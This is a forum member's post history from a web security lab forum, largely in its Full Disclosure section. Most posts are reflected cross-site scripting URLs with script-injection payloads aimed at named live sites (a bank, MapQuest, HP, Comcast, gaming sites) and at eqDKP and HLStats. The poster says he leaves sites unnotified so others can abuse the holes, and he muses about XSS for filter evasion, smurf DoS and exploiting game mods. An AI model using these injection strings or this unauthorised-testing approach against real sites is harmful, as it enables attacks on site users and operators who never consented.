The ha.ckers.org and sla.ckers.org web application security lab house rules and a place for you to introduce yourself if you like. 

Current Page: 1 of 1
Results 1 - 23 of 23
2 years ago
kefka
barbarianbob Wrote:
> Hey Divine_Defender. It's me, Divine_Fire and I
> regret nothing!! http://i.imgur.com/tJPyG.gif

lol.. -- Let us know, when you get caught up, if you have anything interesting to share.
Forum: Intro
6 years ago
kefka
For the record, it's even more painful if your default application is something monstrous (like Lotus Notes). Just imagine, I'm sure you'll chuckle.
Forum: DoS
6 years ago
kefka
Those are from January, bro.

Quote
Re: Myspace new
Posted by: rsnake (IP Logged)
Date: January 15, 2007 01:12AM
Forum: Full Disclosure
7 years ago
kefka
http://www.lewt.com/index.php?keywords=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C/&x=0&y=0&cp=advanced_search&keyword=%27%27%3B%21--&%7B%28%29%7D=&gid=&server_id=&category_id=
Forum: Full Disclosure
7 years ago
kefka
Errr...that site is using 1.3.1 but the most recent version -is- vulnerable.
Forum: Full Disclosure
7 years ago
kefka
XSS in eqDKP 1.3.2c and prior

$path-to-eqdkp/listemembers.php?show="><plaintext>

example: http://www.hellbornguild.com/dkpbc1/listmembers.php?show=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3C/
Forum: Full Disclosure
7 years ago
kefka
.mario Wrote:
> Maybe it would also make sense to post a poc which
> works with an inclusion - an alert proves
> nothing.
>
> What do you think?

The fact that javascript is executed says a lot. Maybe this discussion is more appropriate in a separate thread. What do you think?
Forum: Full Disclosure
7 years ago
kefka
Are you legally in the correct position to give one of us permission to do penetration testing?
Forum: OMG Ponies
7 years ago
kefka
http://help.mapquest.com/jive/kbsearch.jspa?forceEmptySearch=true&advanced=false&childCatID=0&rankBy=10001&parentCatID=1&searchQuery=%22%3E%3Cscript%3Ealert%28%22kefka+owns+mapquest%22%29%3C%2Fscript%3E%3C%2F http://search.about.com/fullsearch.htm?TopNode=%2F&terms=%22%3E%3Cscript%3Ealert%28%22kefka+owns+about.com%22%29%3C%2Fscript%3E%3C%2F&x=36&y=9 http://custom.
Forum: Full Disclosure
7 years ago
kefka
I see where you're coming from maluc but I don't think it would be a good idea for them to have users submitting the content to Google's search engine.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
kefka
Nice finds, another XSS on youtube came across the FullDisclosure mailing list today. http://seclists.org/fulldisclosure/2006/Dec/0436.html
Forum: Full Disclosure
7 years ago
kefka
http://bsdvault.net/search.php?query=%22%3E%3CSCRIPT%3Ealert%28%22kefka%20was%20here%22%29%3C%2FSCRIPT%3E
Forum: Full Disclosure
7 years ago
kefka
I don't know about WebSense. But it blocked it when I banned facebook.com at home from my Proventia M10. Thanks for the help though. id your method worked just fine, that article rocks. Thanks. I'll let you know about WebSense, I'll see what I can do about being there to make sure they try correctly.
Forum: Full Disclosure
7 years ago
kefka
How about XSS as a means of web filter evasion? :) EG. WebSense blocking a website.
Forum: Full Disclosure
8 years ago
kefka
http://wachovia.mworld.com/m/m.w?lp=Search&type=a&mt=1&ticker=%3Cscript%3Ealert%28%22walk-all-ova-ya%22%29%3C%2Fscript%3E&ty.x=Find&fn=on&fs=on&fsc=on&Col=1&Dir=1&st=&gl=1 Damn banks.
Forum: Full Disclosure
8 years ago
kefka
http://h20000.www2.hp.com/bizsupport/TechSupport/ProdSearch.jsp?lang=en&cc=us&taskId=135&prod=%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E
Forum: Full Disclosure
8 years ago
kefka
I pretty much follow a variety of formats depending on my mood but if they don't reply, I become resentful (usually). I post them here, on milw0rm and a couple of other places. If someone gets creative and fucks with them, they'll fix it. It's pretty unorthodox but it's also not _my_ problem, it's theirs.
Forum: Full Disclosure
8 years ago
kefka
I'll be any IP with over 200 smurf responses. Mmmm..yeah.
Forum: Full Disclosure
8 years ago
kefka
http://comsearch.comcast.commerce.atomz.com/?q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&x=0&y=0 http://home.bellsouth.net/s/s.dll?spage=search%2Fresultshome1.htm&_pgoffset=0&startdate=01%2F01%2F2010&man=1&num=10&type=cat&SearchType=web&string=%22%3CSCRIPT%3Ealert%28%22kefka+was+here%22%29%3C%2FSCRIPT%3E%22&imageField.x=0&imageField.y=0&
Forum: Full Disclosure
8 years ago
kefka
Speaking of WoW, here's another major "WoW database" http://www.goblinworkshop.com/search2.html?s=%5C%22%3CSCRIPT%3Ealert%28%5C%22kefka%20was%20here%5C%22%29%3C%2FSCRIPT%3E%5C%22
Forum: Full Disclosure
8 years ago
kefka
Yes, sir there are. I've thought a lot about it. In World of Warcraft, you're allowed to make custom UI mods. A lot of the game takes place in what they call "raid content" aka 40 man dungeons. 40 players going into a dungeon, basically. Well, damn near all of these guilds that run these dungeons require you to run a few mods that I've been interested in exploiting but I'm just a be
Forum: Full Disclosure
8 years ago
kefka
Cross-site Scripting Vulnerability in HLStats <= 1.34

hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22

Search module fails to sanitize quotes.

kefka
kefka@kevinbeardsucks.com

Thanks RSnake
Forum: Full Disclosure
8 years ago
kefka
http://www.serverspy.net/site/stats/mods.html?g=0%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1 Major gaming websites, one for FPS games o
Forum: Full Disclosure